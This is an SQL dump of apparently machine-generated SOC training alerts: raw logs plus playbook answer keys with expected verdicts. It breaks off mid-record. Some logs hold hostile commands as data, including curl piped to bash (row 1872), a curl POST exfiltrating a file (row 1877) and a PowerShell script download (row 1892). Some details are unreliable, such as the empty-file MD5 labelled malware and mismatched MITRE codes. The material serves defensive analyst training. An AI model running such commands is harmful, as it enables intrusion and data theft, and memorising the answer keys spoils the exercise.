(1872, 'Detected Command Injection Attempt', 'high', 'Elastic SIEM', 'A detected command line execution from an external IP contains possible injection commands aimed at a web server.', 'Web Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:20:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"185.143.223.12\",\"dst_ip\":\"192.168.1.10\",\"hostname\":\"WebServer\",\"request_body\":\"curl -s http://malicious.example.com | bash\",\"command_line\":\"curl -s http://malicious.example.com | bash\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for command injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"curl -s http://malicious.example.com | bash\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The detection of a suspicious command line execution from an external IP is confirmed as a true positive due to its malicious nature.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1873, 'Suspicious Network Activity Detected - Potential C2 Communication', 'medium', 'Zeek', 'Zeek has detected network traffic that resembles command and control (C2) beaconing from an internal IP to an external server. However, further investigation reveals this is routine data synchronization with an external service.', 'Data Exfil', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:20:35Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"198.51.100.23\",\"username\":\"service_account\",\"hostname\":\"Internal-Server-01\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for legitimate data sync\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP is associated with a trusted data synchronization service\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is verified as a legitimate service, confirming routine activity.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1874, 'Potential Lateral Movement Detected via PSExec', 'medium', 'Corelight', 'Corelight detected internal traffic that resembles lateral movement using PSExec. However, this was confirmed to be an authorized IT operation for system updates.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:45:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.20\",\"username\":\"admin_user\",\"hostname\":\"Admin-PC\",\"command_line\":\"psexec \\\\\\\\10.0.0.20 -u admin_user cmd\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used in authorized IT operations\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\10.0.0.20 -u admin_user cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used in legitimate system update process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Admin activity confirmed as part of routine maintenance.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1875, 'Brute Force Login Attempts from Unknown IP', 'medium', 'Suricata', 'Multiple failed login attempts from an external IP were detected. Investigation indicates these attempts were part of a penetration test authorized by IT.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:32:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.1.10\",\"username\":\"test_user\",\"hostname\":\"Test-Server\",\"failed_attempts\":15}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with penetration testing activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"test_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Username involved in authorized testing\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP was verified as part of a planned penetration test.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1876, 'Unusual Data Transfer Detected - Potential Data Exfiltration', 'high', 'Wireshark', 'A large volume of data was transferred to an external IP. Investigation reveals this was part of a legitimate backup process to an offsite location.', 'Data Exfil', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:10:05Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.25\",\"dst_ip\":\"192.0.2.45\",\"username\":\"backup_user\",\"hostname\":\"Backup-Server\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used in routine backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.0.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with a known offsite backup provider\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer was confirmed as part of a scheduled backup job.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1877, 'Malicious Command Execution Detected on Internal Network', 'critical', 'Darktrace', 'A suspicious command execution was detected on an internal server, indicating potential compromise. The command is known for data exfiltration activities.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T17:05:47Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"45.33.32.156\",\"username\":\"compromised_user\",\"hostname\":\"Compromised-Server\",\"command_line\":\"curl -X POST http://45.33.32.156/exfil --data-binary @sensitive_data.txt\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in confirmed malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.33.32.156\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported multiple times for involvement in data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"curl -X POST http://45.33.32.156/exfil --data-binary @sensitive_data.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command line execution matches known data exfiltration patterns\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command and external IP have been verified as malicious, confirming the server compromise.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1878, 'Suspicious Network Connection Detected - Potential Data Exfiltration', 'medium', 'Zeek', 'A network connection was detected from an internal IP to an external IP known for suspicious activities. This may be a false alarm caused by routine data backup.', 'Data Exfil', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"198.51.100.23\",\"username\":\"backup_user\",\"hostname\":\"backup-server\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by backup server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 12 times for suspicious activity\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The connection appears to be part of routine data backup procedures.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1879, 'Potential Lateral Movement Detected Using PSExec', 'low', 'Corelight', 'PSExec tool used to execute a command on another machine within the network. Likely a scheduled administrative task.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"admin-pc\",\"command_line\":\"psexec \\\\\\\\192.168.1.10 -u admin -p password cmd.exe /c dir\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.10 -u admin -p password cmd.exe /c dir\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for administrative task scheduling\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This activity matches a known pattern for scheduled administrative tasks.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1880, 'Failed Login Attempts Detected', 'medium', 'Darktrace', 'Multiple failed login attempts detected on a user account from an external IP. Likely triggered by a misconfigured application.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"username\":\"test_user\",\"hostname\":\"web-server\",\"failed_attempts\":20}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 5 times for failed login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"test_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Testing account used internally\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The failed login attempts are consistent with a testing process or misconfigured application.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1881, 'Outbound Traffic to Known Malicious IP', 'critical', 'Suricata', 'Outbound traffic was detected to a known command and control server, indicating a potential compromise.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.200\",\"hostname\":\"infected-pc\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address indicating potential victim machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with C2 activity and malware distribution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The outbound connection to a known C2 server indicates a compromised system.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1882, 'Routine Vulnerability Scan Activity', 'low', 'Wireshark', 'Network traffic patterns associated with vulnerability scans detected. This is part of the regular security assessment schedule.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"192.168.1.35\",\"username\":\"security_admin\",\"hostname\":\"vuln-scan-host\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used by vulnerability scanner\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of target system\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This pattern matches the routine scanning activities performed as part of scheduled maintenance.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1883, 'Routine Vulnerability Scanning Detected', 'low', 'Zeek', 'A network scan was detected originating from an internal IT asset. This was identified as part of a scheduled vulnerability assessment.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"192.168.1.25\",\"username\":\"admin_scanner\",\"hostname\":\"scanner01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal asset performing authorized scans.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_scanner\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Username belongs to authorized IT personnel.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This activity is part of routine vulnerability scans and is not malicious.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1884, 'Potential Phishing Email Detected', 'medium', 'Darktrace', 'An email was received containing a suspicious URL. Further investigation revealed it was a test email from an internal security team.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jane.doe@company.com\",\"hostname\":\"mailserver1\",\"email_sender\":\"security@test.company.com\",\"domain\":\"company.com\",\"url\":\"http://test-phishing.com\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"security@test.company.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Email Systems\",\"verdict\":\"clean\",\"details\":\"Email from internal security team for training purposes.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://test-phishing.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL used for phishing awareness training.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was part of an internal phishing simulation test.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1885, 'Unauthorized Application Execution Alert', 'high', 'Corelight', 'Execution of an unauthorized application was detected on an internal server. This was part of a software update process initiated by IT.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"\",\"username\":\"it_admin\",\"hostname\":\"server02\",\"command_line\":\"/usr/bin/update-software\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal server IP performing authorized tasks.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/update-software\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Software Repository\",\"verdict\":\"clean\",\"details\":\"Command is part of a standard software update process.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process execution is part of a legitimate software update.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1886, 'Suspected Data Exfiltration Attempt', 'high', 'Suricata', 'A high volume of outbound traffic was detected from a user workstation. This was later identified as a routine data backup operation.', 'Data Exfil', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.50\",\"username\":\"backup_user\",\"hostname\":\"workstation07\",\"request_body\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal workstation performing authorized backup.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Destination IP is a trusted backup service provider.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The traffic is part of a scheduled data backup to an external provider.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1887, 'C2 Beaconing Activity Detected', 'critical', 'Wireshark', 'Suspicious outbound connections were detected indicative of command and control activity. Analysis confirmed malicious intent.', 'C2 Beaconing', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"195.23.45.78\",\"username\":\"unknown\",\"hostname\":\"compromised-host\",\"request_body\":\"\",\"command_line\":\"\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"195.23.45.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for command and control activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detected activity is consistent with command and control operations by known threat actors.\"}', 'Beginner', 'NDR', 3, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1888, 'Unauthorized PSExec Usage Detected on Internal Network', 'medium', 'Zeek', 'An internal IP was observed attempting lateral movement using PSExec. No known malicious activity reported on the internal IP.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.1.10\",\"dst_ip\":\"10.1.1.20\",\"username\":\"admin_user\",\"hostname\":\"server01\",\"command_line\":\"psexec \\\\\\\\10.1.1.20 -u admin_user -p password cmd.exe\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address, no external reports\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\10.1.1.20 -u admin_user -p password cmd.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"clean\",\"details\":\"Routine administrative command execution\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity was conducted by an authorized IT admin performing maintenance.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1889, 'External Network Scan Detected', 'low', 'Suricata', 'Multiple network connections from an external IP were flagged as suspicious but identified as part of a routine vulnerability scan by a trusted third-party vendor.', 'Scan', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T16:35:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"198.51.100.2\",\"dst_ip\":\"192.168.1.100\",\"username\":\"N/A\",\"hostname\":\"N/A\",\"request_body\":\"N/A\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.2\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP belongs to a trusted security vendor conducting authorized scans\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"scan\",\"analysis_notes\":\"The IP is part of a scheduled vulnerability assessment by a known vendor.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1890, 'Suspicious Email with Benign Content', 'low', 'Proofpoint', 'An email was flagged for suspicious content but was confirmed as a marketing email from a legitimate source.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T18:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.30\",\"dst_ip\":\"192.168.2.5\",\"username\":\"jane.doe\",\"hostname\":\"workstation01\",\"email_sender\":\"marketing@trustedsource.com\",\"request_body\":\"Check out our new products at https://trustedsource.com\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"marketing@trustedsource.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Email address verified as legitimate marketing contact\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://trustedsource.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Website is verified and safe with SSL certificate\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"This email was a legitimate marketing communication.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1891, 'Routine System Health Check Misinterpreted as C2 Beaconing', 'medium', 'Darktrace', 'Regular system health checks were mistaken for C2 beaconing due to their predictable pattern and external connections.', 'C2 Beaconing', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T20:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"203.0.113.50\",\"username\":\"system_check\",\"hostname\":\"monitoring_server\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"IP associated with monitoring services, no malicious reports\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP used for system health monitoring\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"c2_beaconing\",\"analysis_notes\":\"The network traffic was part of routine health checks performed by internal monitoring systems.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1892, 'Suspicious PowerShell Execution Detected', 'high', 'Wireshark', 'A suspicious PowerShell command was executed from an internal machine, indicating potential misuse.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T22:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.15\",\"dst_ip\":\"N/A\",\"username\":\"user123\",\"hostname\":\"comp02\",\"command_line\":\"powershell.exe -NoProfile -Command \\\"Invoke-WebRequest -Uri http://maliciousdomain.com/script.ps1 -OutFile C:\\\\temp\\\\script.ps1\\\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -NoProfile -Command \\\"Invoke-WebRequest -Uri http://maliciousdomain.com/script.ps1 -OutFile C:\\\\temp\\\\script.ps1\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with known malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL linked to malware hosting\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command and URL are both associated with malware activity, indicating a true positive.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1893, 'Suspicious C2 Beaconing Detected', 'high', 'Zeek', 'A potential C2 beaconing pattern was detected from an external IP to an internal host. This could indicate a compromised machine communicating with a malicious server.', 'Data Exfil', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:34:56Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.101\",\"username\":\"jdoe\",\"hostname\":\"workstation-01\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP 